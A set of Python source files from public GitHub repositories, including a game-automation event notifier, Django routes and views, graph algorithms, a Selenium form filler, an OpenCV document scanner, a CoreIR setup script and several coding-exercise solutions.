acc_plot.plot(val_acc, '*-')\n acc_plot.legend([\"train accuracy\", \"test accuracy\"])\n elif self.check_plot_loss.checkState():\n # Plot loss\n loss = hist['loss']\n loss_plot = self.figure.add_subplot(111)\n loss_plot.clear()\n loss_plot.plot(loss, '*-')\n elif self.check_plot_acc.checkState():\n # Plot acc\n train_acc = hist['train_acc']\n val_acc = hist['val_acc']\n acc_plot = self.figure.add_subplot(111)\n acc_plot.clear()\n acc_plot.plot(train_acc, '*-')\n acc_plot.plot(val_acc, '*-')\n acc_plot.legend([\"train accuracy\", \"test accuracy\"])\n self.canvas.draw()\n\n def save_model(self):\n self.btn_save_model.setDisabled(True)\n self.model.save(config.model_file)\n\n def save_image(self):\n file_name, _ = QFileDialog.getSaveFileName(self, \"保存图片\")\n if file_name:\n canvas_size = self.canvas.size()\n canvas_width, canvas_height = canvas_size.width(), canvas_size.height()\n image = QImage(self.canvas.buffer_rgba(), canvas_width, canvas_height, QImage.Format_RGBA8888)\n image.save(file_name)\n","repo_name":"zhenghaoz/cnn-self-driving","sub_path":"controller/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} 
+{"seq_id":"39714620601","text":"\"\"\"A module for detecting and notifying the user of dangerous in-game events.\"\"\"\n\nfrom src.common import config, utils\nimport time\nimport os\nimport cv2\nimport pygame\nimport threading\nimport numpy as np\nimport keyboard as kb\nfrom src.routine.components import Point\n\n\n# A rune's symbol on the minimap\nRUNE_RANGES = (\n ((141, 148, 245), (146, 158, 255)),\n)\nrune_filtered = utils.filter_color(cv2.imread('assets/rune_template.png'), RUNE_RANGES)\nRUNE_TEMPLATE = cv2.cvtColor(rune_filtered, cv2.COLOR_BGR2GRAY)\n\n# Other players' symbols on the minimap\nOTHER_RANGES = (\n ((0, 245, 215), (10, 255, 255)),\n)\nother_filtered = utils.filter_color(cv2.imread('assets/other_template.png'), OTHER_RANGES)\nOTHER_TEMPLATE = cv2.cvtColor(other_filtered, cv2.COLOR_BGR2GRAY)\n\n# The Elite Boss's warning sign\nELITE_TEMPLATE = cv2.imread('assets/elite_template.jpg', 0)\n\n\ndef get_alert_path(name):\n return os.path.join(Notifier.ALERTS_DIR, f'{name}.mp3')\n\n\nclass Notifier:\n ALERTS_DIR = os.path.join('assets', 'alerts')\n\n def __init__(self):\n \"\"\"Initializes this Notifier object's main thread.\"\"\"\n\n pygame.mixer.init()\n self.mixer = pygame.mixer.music\n\n self.ready = False\n self.thread = threading.Thread(target=self._main)\n self.thread.daemon = True\n\n self.room_change_threshold = 0.9\n self.rune_alert_delay = 270 # 4.5 minutes\n\n def start(self):\n \"\"\"Starts this Notifier's thread.\"\"\"\n\n print('\\n[~] Started notifier')\n self.thread.start()\n\n def _main(self):\n self.ready = True\n prev_others = 0\n rune_start_time = time.time()\n while True:\n if config.enabled:\n frame = config.capture.frame\n height, width, _ = frame.shape\n minimap = config.capture.minimap['minimap']\n\n # Check for unexpected black screen\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if np.count_nonzero(gray < 15) / height / width > self.room_change_threshold:\n self._alert('siren')\n\n # Check for elite warning\n elite_frame = frame[height // 4:3 * height // 4, width // 4:3 * width // 4]\n elite = utils.multi_match(elite_frame, ELITE_TEMPLATE, threshold=0.9)\n if len(elite) > 0:\n self._alert('siren')\n\n # Check for other players entering the map\n filtered = utils.filter_color(minimap, OTHER_RANGES)\n others = len(utils.multi_match(filtered, OTHER_TEMPLATE, threshold=0.5))\n config.stage_fright = others > 0\n if others != prev_others:\n if others > prev_others:\n self._ping('ding')\n prev_others = others\n\n # Check for rune\n now = time.time()\n if not config.bot.rune_active:\n filtered = utils.filter_color(minimap, RUNE_RANGES)\n matches = utils.multi_match(filtered, RUNE_TEMPLATE, threshold=0.9)\n rune_start_time = now\n if matches and config.routine.sequence:\n abs_rune_pos = (matches[0][0], matches[0][1])\n config.bot.rune_pos = utils.convert_to_relative(abs_rune_pos, minimap)\n distances = list(map(distance_to_rune, config.routine.sequence))\n index = np.argmin(distances)\n config.bot.rune_closest_pos = config.routine[index].location\n config.bot.rune_active = True\n self._ping('rune_appeared', volume=0.75)\n elif now - rune_start_time > self.rune_alert_delay: # Alert if rune hasn't been solved\n config.bot.rune_active = False\n self._alert('siren')\n time.sleep(0.05)\n\n def _alert(self, name, volume=0.75):\n \"\"\"\n Plays an alert to notify user of a dangerous event. 
Stops the alert\n once the key bound to 'Start/stop' is pressed.\n \"\"\"\n\n config.enabled = False\n config.listener.enabled = False\n self.mixer.load(get_alert_path(name))\n self.mixer.set_volume(volume)\n self.mixer.play(-1)\n while not kb.is_pressed(config.listener.config['Start/stop']):\n time.sleep(0.1)\n self.mixer.stop()\n time.sleep(2)\n config.listener.enabled = True\n\n def _ping(self, name, volume=0.5):\n \"\"\"A quick notification for non-dangerous events.\"\"\"\n\n self.mixer.load(get_alert_path(name))\n self.mixer.set_volume(volume)\n self.mixer.play()\n\n\n#################################\n# Helper Functions #\n#################################\ndef distance_to_rune(point):\n \"\"\"\n Calculates the distance from POINT to the rune.\n :param point: The position to check.\n :return: The distance from POINT to the rune, infinity if it is not a Point object.\n \"\"\"\n\n if isinstance(point, Point):\n return utils.distance(config.bot.rune_pos, point.location)\n return float('inf')\n","repo_name":"tanjeffreyz/auto-maple","sub_path":"src/modules/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"52"} +{"seq_id":"25965866510","text":"# Cross Platform GUI development with PySimpleGUI\n# cerner_2tothe5th_2021\n# Simple example of using PySimpleGUI to create cross platform GUIs. \n# Install PySimpleGUI using \"pip3 install pysimplegui\"\n\nimport PySimpleGUI as sg\n\ndef main():\n layout = [\n [\n [sg.Text(\"Hello, it's day 4. Let's build a cross platform GUI .\", font='20')],\n [sg.Button('Click Me', key='CLICKME', font=20), sg.Button('Exit', font=20)],\n [sg.Output(font=20)]\n ]\n ]\n window = sg.Window(\"Window\", layout)\n\n while True:\n event, values = window.read()\n if event is None or event == 'Exit':\n return\n if event == 'CLICKME':\n print(\"Yay, you clicked the button. Think of the possibilities. 
\")\nmain()","repo_name":"magicmicah/cerner_2_to_5_2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11625605538","text":"import math\n\nn = int(input())\nar,ar1 = [],[]\n\nfor x in range(n):\n ar.append(int(input()))\n\nfor x in ar:\n if x < 38:\n ar1.append(x)\n elif x >= 38:\n temp = math.ceil(x/5)\n temp = temp*5\n temp2 = temp-x\n if temp2 < 3:\n ar1.append(temp)\n else:\n ar1.append(x)\n\nprint(*ar1,sep = \"\\n\")\n","repo_name":"saifeemustafaq/hackerrankproblemsolving","sub_path":"grading_students.py","file_name":"grading_students.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23856139771","text":"import math\n\nr1, c1 = map(int, input().split(\" \"))\nr2, c2 = map(int, input().split(\" \"))\n\nif r1 == r2 and c1 == c2:\n print(0)\n exit()\n\nif r1 + c1 == r2 + c2 or r1 - c1 == r2 - c2 or abs(c1 - c2) + abs(r1 -\n r2) <= 3:\n print(1)\n exit()\n\nif (abs(r1 - c1) + abs(r2 - c2)) % 2 == 0:\n print(2)\n exit()\n\nb1 = c1 - r1\nb2 = c2 + r2\nx = abs(b1 - b2) // 2\ny = (abs(b1 - b2) // 2) + b1\nif (abs(c1 - y) + abs(r1 - x) <= 3) or (abs(y - c2) + abs(x - r2) <= 3):\n print(2)\nelse:\n print(3)\n","repo_name":"kazztech/atcoder","sub_path":"20201122_abc184/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72813003044","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_view\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('register/', views.register, name='register'),\n path('profile/', views.profile, name='profile'),\n path('dashboard/', views.dashboard, name='dashboard'),\n path('maps/', views.maps, name='maps'),\n path('admin_view/', views.admin_view, name='admin_view'),\n path('download_data/', views.download_data, name='download_data'),\n path('manage_data/', views.manage_data, name='manage_data'),\n path('delete_file/', views.delete_file, name='delete_file'),\n path('upload/', views.upload_file, name='upload_file'),\n path('upload_success/', views.upload_success, name='upload_success'),\n path('edit_user/', views.edit_user, name='edit_user'), \n path('update_user/', views.update_user, name='update_user'),\n path('delete_user/', views.delete_user, name='delete_user'),\n path('login/', auth_view.LoginView.as_view(template_name='users/login.html'), name=\"login\"),\n path('logout/', auth_view.LogoutView.as_view(template_name='users/logout.html'), name=\"logout\"),\n]\n","repo_name":"WesleyWanyama/136895","sub_path":"webinfo/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41769958223","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Firefox()\ndriver.get(\"https://docs.google.com/forms/d/e/1FAIpQLSc3Wp9C6pR2g4KpPgclcJCsN_U7jdc0rWRLk1R4jkj3uxyUpA/viewform\")\ntime.sleep(3)\n\ndiscord_tag = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerViewNumberedItemContainer:nth-child(1) > div:nth-child(1) > div:nth-child(1) > div:nth-child(2) > div:nth-child(1) > div:nth-child(1) > 
div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\ndiscord_tag.send_keys(\"!!!ahhhhh!!!#7441\")\nrepo = driver.find_element(By.CSS_SELECTOR, \".freebirdFormviewerComponentsQuestionTextUrl > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\nrepo.send_keys(\"https://github.com/Kev-in123/Python-Automation-Thingy\")\nsomething = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionRadioChoice:nth-child(1) > label:nth-child(1)\")\nsomething.click()\ntags1 = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionCheckboxChoice:nth-child(1) > label:nth-child(1)\")\ntags1.click()\ntags2 = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionCheckboxChoice:nth-child(2) > label:nth-child(1)\")\ntags2.click()\ntype = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerViewNumberedItemContainer:nth-child(5) > div:nth-child(1) > div:nth-child(1) > div:nth-child(2) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\ntype.send_keys(\"something\")\npick = driver.find_element(By.CSS_SELECTOR, \".quantumWizMenuPaperselectEl\")\npick.click()\noption1 = driver.find_element(By.CSS_SELECTOR, \".exportSelectPopup > div:nth-child(3) > span:nth-child(2)\")\noption1.click()\nsubmit = driver.find_element(By.CSS_SELECTOR, \".appsMaterialWizButtonPaperbuttonFilled > span:nth-child(3)\")\nsubmit.click()\n\ntime.sleep(3)\ndriver.close()\n","repo_name":"Kev-in123/Python-Automation","sub_path":"src/Intro to Automation with Python - Challenge.py","file_name":"Intro to Automation with Python - Challenge.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"428415977","text":"from heapq import *\nfrom copy import copy\nfrom ..graph.vertex_edge import Vertex, Edge\nfrom ..graph.graph import Graph\nfrom ..graph.orientedGraph import OrientedGraph\nfrom .search import get_connected_components\n\n\ndef all_shortest_paths(graph):\n \"\"\"\n Floyd-Warshall algorithm.\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the algorithm\n\n Returns\n -------\n A matrix M (list of list) where M[i][j] = the length of the\n shortest path from vertex i to vertex j\n \"\"\"\n adj = copy(graph.adjacency_matrix())\n n = len(adj)\n for i in range(n):\n for j in range(n):\n if adj[i][j] == 0 and i != j:\n adj[i][j] = float(\"inf\")\n for k in range(n):\n for i in range(n):\n for j in range(n):\n adj[i][j] = min(adj[i][j], adj[i][k]+adj[k][j])\n return adj\n\n\ndef shortest_path(graph, v_start, v_end, heuristic):\n \"\"\"\n A* algorithm\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the search\n\n 'v_start' : a Vertex object\n Starting point of the algorithm\n\n 'v_end' : a Vertex object\n Target point of the algorithm\n\n 'heuristic' : a function (Vertex a, Vertex b) -> weight\n Evaluate the remaining distance from a to b\n\n Returns\n -------\n The length l and the sequence of vertices of (one of the) shortest\n paths from v_start to v_end\n \"\"\"\n heap = [(0, 0, 0, v_start, None)]\n dist = dict()\n origin = dict()\n t = 0\n while len(heap) != 0 and v_end not in dist:\n _, weight, _, node, father = heappop(heap)\n if node in dist:\n continue\n dist[node] = weight\n origin[node] = father\n for edge in graph.get_neighbours_edge(node):\n neighbour = edge.other(node)\n if neighbour not in dist:\n t += 1\n 
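# 't' is a strictly increasing tie-breaker: when two heap entries carry equal weights,\n # heapq compares the next tuple element, and without 't' it would end up comparing\n # Vertex objects directly, which may not be orderable\n 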
realweight = weight + edge[\"weight\"]\n fakeweight = realweight + heuristic(neighbour, v_end)\n heappush(heap, (fakeweight, realweight, t, neighbour, node))\n\n def recover(node):\n ans = []\n while node is not None:\n ans.append(node)\n node = origin[node]\n return ans[::-1]\n if v_end not in dist:\n return float(\"inf\"), []\n return dist[v_end], recover(v_end)\n\n\ndef dijkstra(graph, v_start, v_end):\n \"\"\"\n Dijkstra's algorithm\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the search\n\n 'v_start' : a Vertex object\n Starting point of the algorithm\n\n 'v_end' : a Vertex object\n Target point of the algorithm\n\n Returns\n -------\n The length l and the sequence of vertices of (one of the) shortest\n paths from v_start to v_end\n \"\"\"\n def no_heuristic(a, b):\n return 0\n return shortest_path(graph, v_start, v_end, no_heuristic)\n\n\ndef bellman_ford(graph, s):\n nbnodes = len(graph.vertices())\n dist = {vertex: float(\"inf\") for vertex in graph.vertices()}\n dist[s] = 0\n for _ in range(nbnodes-1):\n for edge in graph.edges(erase_multiple=False):\n dist[edge.end] = min(\n dist[edge.end], dist[edge.start] + edge[\"weight\"])\n for edge in graph.edges(erase_multiple=False):\n if dist[edge.start] + edge[\"weight\"] < dist[edge.end]:\n raise Exception(\"Negative cycle has been found\")\n return dist\n\n\ndef diameter(graph):\n \"\"\"\n The diameter is defined as the longest shortest path among all pairs\n of vertices. It is by convention infinite for non-connected graphs\n\n Parameters\n ----------\n 'graph' : a Graph object\n The graph on which to perform the algorithm\n\n Returns\n -------\n The diameter of the graph.\n \"\"\"\n paths = all_shortest_paths(graph)\n n = len(paths)\n maxi = -float(\"inf\")\n for i in range(n):\n for j in range(n):\n if paths[i][j] >= maxi:\n maxi = paths[i][j]\n return maxi\n\n\ndef biggest_component_diameter(graph):\n \"\"\"\n Computes the diameter of the biggest component of the graph\n\n Parameters\n ----------\n 'graph' : a Graph object\n The graph on which to perform the algorithm\n\n Returns\n -------\n The diameter of the biggest component of the graph\n \"\"\"\n comp_list = get_connected_components(graph)\n n = 0\n biggest = -1\n for i in range(len(comp_list)):\n if len(comp_list[i]) > n:\n n = len(comp_list[i])\n biggest = i\n return diameter(Graph.renumber(comp_list[biggest]))\n","repo_name":"GCoiffier/graph_tools","sub_path":"graphtool/algorithms/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38780087701","text":"import subprocess\nimport os\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nfrom distutils.command.build import build\nimport glob\nimport shutil\nimport sys\nimport platform\nimport multiprocessing\n\n\n_system = platform.system()\nif _system == \"Linux\":\n extra_libs = []\n lib_ext = \"so\"\n static_build = True\nelif _system == \"Darwin\":\n extra_libs = [\"coreir\", \"coreirsim\"]\n lib_ext = \"dylib\"\n # osx default xcode doesn't support static build\n static_build = False\nelse:\n raise NotImplementedError(_system)\n\nif os.environ.get('TRAVIS') == 'true':\n njobs = 2\nelse:\n try:\n cpus = len(os.sched_getaffinity(0))\n except AttributeError:\n cpus = multiprocessing.cpu_count()\n njobs = max(2, cpus)\n\nCOREIR_PATH = \"coreir-cpp\"\nCOREIR_REPO = \"https://github.com/rdaly525/coreir\"\nCOREIR_NAME = 
\"coreir\"\nCOREIR_BRANCH = \"master\"\n\n\nTEXT_CHARS = bytearray({7, 8, 9, 10, 12, 13, 27} | set(range(0x20, 0x100)) -\n {0x7f})\n\n\ndef is_binary_string(bytes):\n return bool(bytes.translate(None, TEXT_CHARS))\n\n\ndef is_binary(path):\n # adapted from https://stackoverflow.com/a/7392391\n with open(path, \"rb\") as f:\n return is_binary_string(f.read(1024))\n\n\nCOREIR_BINARY_PATH = None\nfor line in os.popen(\"which -a coreir\").read().splitlines():\n if is_binary(line):\n COREIR_BINARY_PATH = line\n break\n\n\nclass CoreIRExtension(Extension):\n def __init__(self, name, sourcedir=''):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CoreIRBuild(build_ext):\n libs = [\"coreir-c\", \"coreirsim-c\", \"coreir-ice40\", \"coreir-aetherlinglib\",\n \"coreir-commonlib\", \"coreir-float\", \"coreir-rtlil\",\n \"coreir-float_CW\", \"coreir-float_DW\", \"verilogAST\"] + extra_libs\n\n def run(self):\n # skip if coreir binary is found. this is useful if people want\n # to use their own version of coreir\n\n if COREIR_BINARY_PATH is not None:\n # we're done here since users provide their own coreir distribution\n return\n\n # we only have one extension\n assert len(self.extensions) == 1\n ext = self.extensions[0]\n extdir = \\\n os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n extdir = os.path.join(extdir, COREIR_NAME)\n if not os.path.isdir(extdir):\n os.mkdir(extdir)\n\n if not os.path.isdir(COREIR_PATH):\n subprocess.check_call([\"git\", \"clone\", \"--depth=1\", \"--branch\",\n COREIR_BRANCH, COREIR_REPO, COREIR_PATH])\n build_dir = os.path.join(COREIR_PATH, \"build\")\n\n if static_build:\n subprocess.check_call([\"cmake\", \"-DSTATIC=ON\", \"..\"],\n cwd=build_dir)\n else:\n subprocess.check_call([\"cmake\", \"..\"], cwd=build_dir)\n\n for lib_name in self.libs:\n subprocess.check_call([\"make\", \"-C\", build_dir, f\"-j{njobs}\",\n lib_name])\n # make the binary\n subprocess.check_call([\"make\", \"-C\", build_dir, f\"-j{njobs}\",\n \"coreir-bin\"])\n\n # copy libraries over\n for lib_name in self.libs:\n filename = os.path.join(\n COREIR_PATH, \"build\", \"lib\",\n \"lib{}.{}\".format(lib_name, lib_ext)\n )\n shutil.copy(filename, extdir)\n\n # copy binary over\n filename = os.path.join(COREIR_PATH, \"build\", \"bin\", \"coreir\")\n shutil.copy(filename, extdir)\n\n\nscripts = []\nif not COREIR_BINARY_PATH:\n scripts.append(\"bin/coreir\")\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='coreir',\n version='2.0.156',\n description='Python bindings for CoreIR',\n packages=[\"coreir\"],\n license='BSD License',\n url='https://github.com/leonardt/pycoreir',\n author='Leonard Truong',\n author_email='lenny@cs.stanford.edu',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=[\"hwtypes\"],\n ext_modules=[CoreIRExtension('coreir')],\n scripts=scripts,\n cmdclass=dict(build_ext=CoreIRBuild),\n zip_safe=False\n)\n","repo_name":"leonardt/pycoreir","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"37647124351","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Hotels\nfrom .serializers import HotelSerializers\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\ndef home(request):\n return 
HttpResponse(\"Hello Canada\")\n\n\n@api_view(['GET', 'POST'])\ndef hotel_details(request):\n if request.method == \"GET\":\n hotel_list = Hotels.objects.all()\n hotel_get_serializer = HotelSerializers(hotel_list, many=True)\n return Response(hotel_get_serializer.data)\n if request.method == \"POST\":\n hotel_val = request.data\n hotel_post_serializer = HotelSerializers(data=hotel_val)\n if hotel_post_serializer.is_valid():\n hotel_post_serializer.save()\n return Response({\"Message\": \"Added Successfully\"})\n\n\n@api_view(['GET'])\ndef hotel_filters(request, pk):\n if request.method == \"GET\":\n hotel_list = Hotels.objects.get(id=pk)\n hotel_get_serializer = HotelSerializers(hotel_list, many=False)\n return Response(hotel_get_serializer.data)\n\n","repo_name":"A00453339/Django_Assignment","sub_path":"DjangoPrj/DjangoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43100819408","text":"# Importing necessary libraries\nimport cv2\nimport numpy as np\nimport requests\nimport imutils\nimport os\n\n# Setting up IP webcam to connect to an Android phone \nurl = 'http://192.168.1.104:8080/shot.jpg'\nframeWidth = 640 \nframeHeight = 480\n\ndef preprocessImage(img):\n # converting to grayscale\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # blurring\n imgBlur = cv2.blur(imgGray, (5, 5), 1)\n # generate canny features\n imgCanny = cv2.Canny(imgBlur, 100, 150)\n\n #Next, we will pass the image through 2 passes of dilation & 1 pass of erosion\n #so as to make the edges more visible\n kernel = np.ones((5, 5))\n imgDil = cv2.dilate(imgCanny, kernel, iterations=2)\n imgEros = cv2.erode(imgDil, kernel, iterations=1)\n\n return imgEros\n\ndef getContours(img):\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n \n maxArea = 0\n biggest = np.array([])\n\n for cnt in contours:\n area = cv2.contourArea(cnt)\n\n if area > 5000:\n cv2.drawContours(frameCnt, cnt, -1, (255, 0, 0), 3)\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02*perimeter, True)\n\n if area > maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n \n return biggest\n\n# Warp the image and get a perspective transform on the biggest contour portion\ndef getWarp(img, biggest):\n biggest = reorder(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0,0], [frameWidth, 0], [0, frameHeight], [frameWidth, frameHeight]])\n\n matrix = cv2.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv2.warpPerspective(img, matrix, (frameWidth, frameHeight))\n\n return imgOutput\n\n# Reorders the warp points \ndef reorder(points):\n points = points.reshape((4, 2))\n newPoints = np.zeros((4, 1, 2), np.int32)\n\n sum = points.sum(1)\n diff = np.diff(points, axis=1)\n\n newPoints[0] = points[np.argmin(sum)]\n newPoints[1] = points[np.argmin(diff)]\n newPoints[2] = points[np.argmax(diff)]\n newPoints[3] = points[np.argmax(sum)]\n\n return newPoints\n\n\n\nwhile cv2.waitKey(1) != 27: # press ESC to break out\n img_resp = requests.get(url, verify=False)\n img_arr = np.array(bytearray(img_resp.content), dtype=np.uint8)\n frame = cv2.imdecode(img_arr, -1)\n frame = imutils.resize(frame, width=frameWidth, height=frameHeight)\n\n frameCnt = frame.copy() # a copy to draw contours onto\n frame_pre = preprocessImage(frame)\n biggest = getContours(frame_pre)\n\n frameWarped = frameCnt\n\n if(biggest.shape != (0,)):\n frameWarped = getWarp(frame, biggest)\n cv2.imwrite('scanned.jpg', 
frameWarped)\n\n cv2.imshow(\"Original\", frameWarped)\n\ncv2.destroyAllWindows()\n","repo_name":"prateekb1912/document-scanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71251561126","text":"from Helper import google_bucket\n\n# Create an instance of class: google_bucket\ngoogle = google_bucket()\n\n# Create a new bucket\ngoogle.create_bucket(bucket_name='new_movies_bucket')\n\n# Process the ratings and movies files into DataFrames\nratings = google.process_ratings()\nmovies = google.process_movies()\n\n# Export DataFrames to CSV\ngoogle.export_dataframe_to_csv(dataframe=ratings, csv_name='ratings')\ngoogle.export_dataframe_to_csv(dataframe=movies, csv_name='movies')\n\n# Load CSV files into the new Bucket\ngoogle.load_data(blob_path='movies_project/ratings', file_path='ratings.csv', bucket_name='new_movies_bucket')\ngoogle.load_data(blob_path='movies_project/movies', file_path='movies.csv', bucket_name='new_movies_bucket')\n\n\n","repo_name":"bardadon/Movies-Data-ETL","sub_path":"movies_etl.py","file_name":"movies_etl.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"72840539685","text":"# Brute Force 1 \n# Make a func permute(nums, current_index) to create all permutations.\n# Take the cur_index ele and swap it with every ele to its right (itself included). Eg: a, b, c. Swap a with a, then a with b, then a with c.\n# Move to the next index ele and call the func recursively.\n# Time complexity : O(n!). A total of n! permutations will be generated for an array of length n.\n# Space complexity : O(n).\n \n# public class Solution {\n# int count = 0;\n# public int countArrangement(int N) {\n# int[] nums = new int[N];\n# for (int i = 1; i <= N; i++)\n# nums[i - 1] = i;\n# permute(nums, 0);\n# return count;\n# }\n# public void permute(int[] nums, int l) {\n# if (l == nums.length - 1) {\n# int i;\n# for (i = 1; i <= nums.length; i++) {\n# if (nums[i - 1] % i != 0 && i % nums[i - 1] != 0)\n# break;\n# }\n# if (i == nums.length + 1) {\n# count++;\n# }\n# }\n# for (int i = l; i < nums.length; i++) {\n# swap(nums, i, l);\n# permute(nums, l + 1);\n# swap(nums, i, l);\n# }\n# }\n# public void swap(int[] nums, int x, int y) {\n# int temp = nums[x];\n# nums[x] = nums[y];\n# nums[y] = temp;\n# }\n# }\n\n\n# backtracking\n# check every digit, if cur valid, check next digit, \n# if all digits valid, count+1, once checked, swap back up.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n self.visited = [False]*(n+1)\n self.count = 0\n \n def calculate(n, pos):\n if pos > n: self.count += 1\n for i in range(1, n+1):\n if not self.visited[i] and (pos % i == 0 or i%pos == 0):\n self.visited[i] = True\n calculate(n, pos+1)\n self.visited[i] = False\n \n calculate(n, 1)\n return self.count","repo_name":"yukiyao119/Leetcode-practice","sub_path":"BeautifulArrangement.py","file_name":"BeautifulArrangement.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22324182081","text":"\"\"\"\nСоздать (программно) текстовый файл, записать в него программно набор чисел,\nразделенных пробелами. 
Программа должна подсчитывать сумму чисел в файле и\nвыводить ее на экран.\nCreate (using a program) a text file and write (with a program) a set of numbers\nseparated by spaces. The program must calculate the sum of the numbers in the\nfile and display it on the screen.\n\"\"\"\n\n\nnumber_sum = 0\nwith open(r\"D:\\Python_basics\\Lesson_5.5.txt\", 'w') as numbers:\n    numbers.writelines(input(\"Enter numbers, using space - \"))\nwith open(r\"D:\\Python_basics\\Lesson_5.5.txt\") as numbers:\n    for line in numbers:\n        numbers_list = line.split()\n        for i in numbers_list:\n            number_sum = number_sum + int(i)\n    print(number_sum)\n","repo_name":"freebrains/Python_basics","sub_path":"Lesson_5.5.py","file_name":"Lesson_5.5.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"8664935055","text":"import socket\n# simple one-shot TCP proxy: accept on 8080 and forward each request to 8088\napaaddr=('127.0.0.1',8088)\nseraddr=('127.0.0.1',8080)\nser=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nser.bind(seraddr)\nser.listen(5)\npoll=[]\nwhile True:\n\tcon,addr=ser.accept()\n\tpoll.append(con)\n\n\twhile len(poll):\n\t\tc=poll.pop(0)\n\t\tbuf=c.recv(1024)\n\t\tif not buf:\n\t\t\tc.close()\n\t\t\tcontinue\n\t\t# a socket cannot be reused after close(), so open a fresh upstream connection per request\n\t\tapaser=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t\tapaser.connect(apaaddr)\n\t\tapaser.send(buf)\n\t\tdata=apaser.recv(1024)\n\t\tc.send(data)\n\t\tc.close()\n\t\tapaser.close()","repo_name":"JamesLinus/OMMPS","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
